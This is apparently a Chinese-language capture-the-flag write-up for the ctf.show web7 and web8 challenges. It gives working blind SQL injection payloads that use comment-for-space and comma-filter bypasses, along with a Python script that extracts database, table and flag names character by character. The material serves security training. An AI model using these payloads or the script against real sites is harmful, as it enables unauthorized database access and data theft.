题目网站https://ctf.show
web7
点开其中一篇文章,输入id=1||1存在全部文章内容,说明为整形注入
1.爆库名(web7)
当输入为id=-1/**/or/**/ascii(substr(database(),1,1))=119时出现文章内容,证明库名的第一个字符为‘w’,以此类推。
2.爆表名(flag,page,user)
id=-1/**/or/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/0,1),1,1))=102
3.爆字段(flag)
id=-1/**/or/**/ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name="flag"/**/limit/**/0,1),1,1))=102
4.爆字段值
id=-1/**/or/**/ascii(substr((select/**/flag/**/from/**/flag/**/limit/**/0,1),1,1))=102
附:python脚本
import requests
url = "http://124.156.121.112:28069/?id=-1/**/"
def db(url): #爆库名
database=""
for i in range(1,50):
print(i)
for j in range(40,128):
u= "||/**/ascii(substr(database()/**/from/**/{0}/**/for/**/1))={1}".format(i,j)
s = url+u
r = requests.get(s)
if 'By Rudyard Kipling' in r.text:
database+=chr(j)
print(database)
break
def table(url): #爆表名
table=""
for i in range(1,50):
print(i)
for j in range(40,128):
u="||ascii(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{0},1))={1}".format(i,j)
s = url+u
r = requests.get(s)
if 'By Rudyard Kipling' in r.text:
table+=chr(j)
print(table)
break
web8
在上一题的基础上增加了逗号的过滤
绕过方法:
1.将limit 0,1样式改为limit 1 offset 0。
2.将substr(string,1,1)改为substr(string from 1 for 1)。
